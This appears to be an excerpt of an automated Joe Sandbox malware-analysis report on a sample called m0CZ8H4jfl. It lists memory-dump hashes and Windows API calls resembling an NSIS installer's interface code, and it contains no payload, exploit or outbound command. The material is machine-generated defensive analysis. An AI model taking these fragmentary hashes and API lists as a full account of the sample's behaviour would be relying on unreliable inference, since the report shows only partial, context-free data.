                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ad097771845757ed23a04546ab7528f9996c961d7ab80ae548bf3567764a1a1f
                                                                                                          • Instruction ID: 49dcce66406d6a62e0f5d01af04afd286f8dc03b2b64755f95a126e2cba63a6a
                                                                                                          • Opcode Fuzzy Hash: ad097771845757ed23a04546ab7528f9996c961d7ab80ae548bf3567764a1a1f
                                                                                                          • Instruction Fuzzy Hash: 18C19274E00218CFEB54DFA5D994BADBBB2BF89300F1081A9D809AB355DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 533e0a5bed8b167c22ada5de2c953e0591a376fd010f18abfab65b549e16f10d
                                                                                                          • Instruction ID: 96118b9753ee9901917707407431670778338930730e01fe736a29aefe322e71
                                                                                                          • Opcode Fuzzy Hash: 533e0a5bed8b167c22ada5de2c953e0591a376fd010f18abfab65b549e16f10d
                                                                                                          • Instruction Fuzzy Hash: E0C19274E00218CFEB14DFA5D994B9DBBB2BF89300F1091A9D809AB355DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0b68e8ac251f0895a7ca4597027bcf8c9325487ade676e6eab4b8b44a1da6ff0
                                                                                                          • Instruction ID: dd7c63ed9df1a83b80db5bb935a3c25bf82b49d021f2dbde6a08a10f9dc74795
                                                                                                          • Opcode Fuzzy Hash: 0b68e8ac251f0895a7ca4597027bcf8c9325487ade676e6eab4b8b44a1da6ff0
                                                                                                          • Instruction Fuzzy Hash: 7EC1A274E00218CFEB54DFA5D994B9DBBB2BF89300F1081A9D809AB355DB359E85CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 962e949b907a38d94905f2286592479bf05a8b53309af4075c2199a95f813129
                                                                                                          • Instruction ID: 52d19ca2ae75fc3bc04bcdee5ab70526829ec81779c789951bf0c6f18314f929
                                                                                                          • Opcode Fuzzy Hash: 962e949b907a38d94905f2286592479bf05a8b53309af4075c2199a95f813129
                                                                                                          • Instruction Fuzzy Hash: A4C18174E00218CFEB54DFA5D994BADBBB2BF89300F1081A9D809AB355DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0902b5e07d64ac72482a77a19c129f87bc72e16030d029fbe38177b21848bc87
                                                                                                          • Instruction ID: 3787c6fdbcd90664e659c38b370cf377ce7720050f5ce91d6b68e7582e456d14
                                                                                                          • Opcode Fuzzy Hash: 0902b5e07d64ac72482a77a19c129f87bc72e16030d029fbe38177b21848bc87
                                                                                                          • Instruction Fuzzy Hash: 1CC1A474E00218CFEB14DFA5D994BADBBB2BF89300F5081A9D809AB355DB355E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 18ea78d43e0599ded3fdfa7867c24ee8ff4f9510cc9226b17126903f18289e45
                                                                                                          • Instruction ID: d799b1ad6b9abe4091eafb9d620a19668a2610238ca28ba426d4f3eeaecf985f
                                                                                                          • Opcode Fuzzy Hash: 18ea78d43e0599ded3fdfa7867c24ee8ff4f9510cc9226b17126903f18289e45
                                                                                                          • Instruction Fuzzy Hash: 4EC1B274E00218CFEB14DFA5D994B9DBBB2BF89301F1080A9D809AB365DB359E85CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 85202bf227c1a762531a0b0c764705fb682e7f56950dfeda44cc3b1752c5003c
                                                                                                          • Instruction ID: 675cc03baf0f0e000193140c7748e157324512f116280592dd8f1e6f7545a2f1
                                                                                                          • Opcode Fuzzy Hash: 85202bf227c1a762531a0b0c764705fb682e7f56950dfeda44cc3b1752c5003c
                                                                                                          • Instruction Fuzzy Hash: 87C19274E00218CFEB54DFA5D994B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b5018b4669103d1e4bed7509546a466db6b920cf018dc36d16dadb7e8b768245
                                                                                                          • Instruction ID: 7051620a00e1187874c190fd6515a46359817d271bb638bf6d0f6584d07fc8c8
                                                                                                          • Opcode Fuzzy Hash: b5018b4669103d1e4bed7509546a466db6b920cf018dc36d16dadb7e8b768245
                                                                                                          • Instruction Fuzzy Hash: CFC19374E00218CFEB54DFA5D994B9DBBB2BF89300F1081A9D809AB355DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: fdb88d195d1f6aba0a81fd213294d1cdf2f117d733d35d6102144694a5a2fb4a
                                                                                                          • Instruction ID: e7b784cb2a58ffc83074bdc988f4aec3739f3e24f5c3c12c374c0c03bd5a6714
                                                                                                          • Opcode Fuzzy Hash: fdb88d195d1f6aba0a81fd213294d1cdf2f117d733d35d6102144694a5a2fb4a
                                                                                                          • Instruction Fuzzy Hash: F8C19174E00218CFEB14DFA5D994B9DBBB2BF89300F2081A9D819AB355DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e211a169f18f4ea2d8c43a178bf9cb642e5df503240273c59bf65ae658e374f8
                                                                                                          • Instruction ID: 40759d8b874c83d096f3e9d3187fa22bae3e2f155f088c13f1bf58d1d85b30b9
                                                                                                          • Opcode Fuzzy Hash: e211a169f18f4ea2d8c43a178bf9cb642e5df503240273c59bf65ae658e374f8
                                                                                                          • Instruction Fuzzy Hash: E3C1B274E00218CFEB14DFA5D994BADBBB2BF89300F1080A9D809AB355DB355E85CF54
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 789d781b79309783290799625b927c53b0c84f9e536cc90cdcf9b95779742b18
                                                                                                          • Instruction ID: e656cba63c02a8034f6d29e4f1c81f523fc0a1e429de4f469447b72b10620fe1
                                                                                                          • Opcode Fuzzy Hash: 789d781b79309783290799625b927c53b0c84f9e536cc90cdcf9b95779742b18
                                                                                                          • Instruction Fuzzy Hash: D0C1A274E00218CFEB14DFA5D994B9DBBB2BF89300F2081A9D809AB355DB359E85CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5c11e01e8854f2f3e38c905acb48af3cbc958281221e98755c96738fde87f9f4
                                                                                                          • Instruction ID: 4b3bfa014403c645426fdae42f1158b71a378a3607d1d883aae8f3d40477c60b
                                                                                                          • Opcode Fuzzy Hash: 5c11e01e8854f2f3e38c905acb48af3cbc958281221e98755c96738fde87f9f4
                                                                                                          • Instruction Fuzzy Hash: BFC1A274E00218CFEB54DFA5D994B9DBBB2BF89301F1081A9D809AB355DB359E85CF10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c8b9c904d58bc1bd24ce87d09f034438dd1ba0a89986c21093d2bee03f4906c0
                                                                                                          • Instruction ID: eb9684cefa1b4b8428cb89614c9ccc00e38d715f90f17e5980eb0748eae9c995
                                                                                                          • Opcode Fuzzy Hash: c8b9c904d58bc1bd24ce87d09f034438dd1ba0a89986c21093d2bee03f4906c0
                                                                                                          • Instruction Fuzzy Hash: 2BC19274E00218CFEB54DFA5D994B9DBBB2BF89300F1081A9D809AB355DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f1cd621107af99333a978ed386c0acd5dea62049e9395db39d8b33aaf53c6bb0
                                                                                                          • Instruction ID: 40c55428963798952d86aa205a43fed3e42d106fd76418ed3e77d194c5a6550d
                                                                                                          • Opcode Fuzzy Hash: f1cd621107af99333a978ed386c0acd5dea62049e9395db39d8b33aaf53c6bb0
                                                                                                          • Instruction Fuzzy Hash: 8BC18174E00218CFEB54DFA5D994B9DBBB2BF89300F1081A9D809AB365DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9a689ce27a0b2c62f2642dff74f98eaab1d0a94c6db28b3cfb844155b9fa79c6
                                                                                                          • Instruction ID: e8a90efe768c6eca3c7fc1ab6991536b23a86ad903de42f6ea4d4312263e74bf
                                                                                                          • Opcode Fuzzy Hash: 9a689ce27a0b2c62f2642dff74f98eaab1d0a94c6db28b3cfb844155b9fa79c6
                                                                                                          • Instruction Fuzzy Hash: 9AC19174E00218CFEB54DFA5D994B9DBBB2BF89300F1080A9D809AB365DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c038e4a98afaa14d9dbb2b4c1faaab463c1d6bea5960b5a02fda5f6641d9d400
                                                                                                          • Instruction ID: 3bee378e8557df5bd26246fe2e893a45d83035d7b024b020482d3283a14c7f7f
                                                                                                          • Opcode Fuzzy Hash: c038e4a98afaa14d9dbb2b4c1faaab463c1d6bea5960b5a02fda5f6641d9d400
                                                                                                          • Instruction Fuzzy Hash: 93C18174E00218CFEB54DFA5D994B9DBBB2BF89300F1081A9D809AB365DB355E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ce6313e91399ac6729fccc1031fb3ae9c08fa641da7bcdbe009353fdc42a2df0
                                                                                                          • Instruction ID: 1c183637d610f80be3cc47f81e7b47ef78dcdc594e07037ae5f4b5d6da3e6211
                                                                                                          • Opcode Fuzzy Hash: ce6313e91399ac6729fccc1031fb3ae9c08fa641da7bcdbe009353fdc42a2df0
                                                                                                          • Instruction Fuzzy Hash: A7C19274E00218CFEB14DFA5D994B9DBBB2BF89301F1081A9D809AB365DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7877bfe4793f3acfa6ab2e88dd1483d905f9f11ce360406139c554b92f67194b
                                                                                                          • Instruction ID: c4d58d400355b71dfcdef910e00065d72c68c2cc7a46d398cd387470bee33e41
                                                                                                          • Opcode Fuzzy Hash: 7877bfe4793f3acfa6ab2e88dd1483d905f9f11ce360406139c554b92f67194b
                                                                                                          • Instruction Fuzzy Hash: E8C1A374E00218CFEB54DFA5D994B9DBBB2BF89300F1081A9D809AB355DB359E85CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c653a77043501b39b7ab886a962549158f91e82ea30b96bb8ab0350eba45c220
                                                                                                          • Instruction ID: 73e00b3e905dc21ab1944b2612c715012a5635fc396e992048b35182fcabc5fe
                                                                                                          • Opcode Fuzzy Hash: c653a77043501b39b7ab886a962549158f91e82ea30b96bb8ab0350eba45c220
                                                                                                          • Instruction Fuzzy Hash: 39C1A374E00218CFEB54DFA5D954BADBBB2BF89300F1080A9D809AB355DB359E85CF54
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2662847630.0000000036AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_36ab0000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1be35ee41ab1346e1def49e4f79ce8201347aa6f3fe7bf3433a0715abbb4545d
                                                                                                          • Instruction ID: a86ecc865fb50768f9f7925b2dd7fffb14327dd7fda91d75de26878cac55bf1c
                                                                                                          • Opcode Fuzzy Hash: 1be35ee41ab1346e1def49e4f79ce8201347aa6f3fe7bf3433a0715abbb4545d
                                                                                                          • Instruction Fuzzy Hash: 6EC1A374E00218CFEB14DFA5D994BADBBB2BF89300F1081A9D809AB355DB359E85CF54
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                          • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                          • ShowWindow.USER32(?,?), ref: 00405440
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00405461
                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                          • GetDlgItem.USER32(?,?), ref: 0040536F
                                                                                                            • Part of subcall function 0040414E: SendMessageW.USER32(?,?,00000001,00403F7A), ref: 0040415C
                                                                                                          • GetDlgItem.USER32(?,?), ref: 004054B3
                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                          • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                          • ShowWindow.USER32(?,?), ref: 004054F1
                                                                                                          • ShowWindow.USER32(?), ref: 0040553B
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                          • CreatePopupMenu.USER32 ref: 00405580
                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                          • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                          • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                          • EmptyClipboard.USER32 ref: 0040561B
                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                          • CloseClipboard.USER32 ref: 00405676
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                          • String ID: {
                                                                                                          • API String ID: 590372296-366298937
                                                                                                          • Opcode ID: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                          • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                          • Opcode Fuzzy Hash: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                          • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                          APIs
                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                          • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                          • DestroyWindow.USER32 ref: 00403CAE
                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                          • EnableWindow.USER32(?,?), ref: 00403F02
                                                                                                          • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                          • SendMessageW.USER32(?,?,00000000,00000001), ref: 00403F52
                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                          • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                          • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 184305955-0
                                                                                                          • Opcode ID: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                          • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                          • Opcode Fuzzy Hash: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                          • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D
                                                                                                          APIs
                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00404368
                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                          • GetSysColor.USER32(?), ref: 00404396
                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                          • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                          • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00404464
                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                          • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                          • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                          • SendMessageW.USER32(?,00000000,00000000), ref: 0040451D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                          • String ID: -B@$N$open
                                                                                                          • API String ID: 3615053054-1057335957
                                                                                                          • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                          • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                          • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                          • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,?,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                            • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                          • lstrcatW.KERNEL32(00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,76F93420,00441800,00000000,0043F000), ref: 0040391F
                                                                                                          • lstrlenW.KERNEL32(00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,76F93420), ref: 0040399F
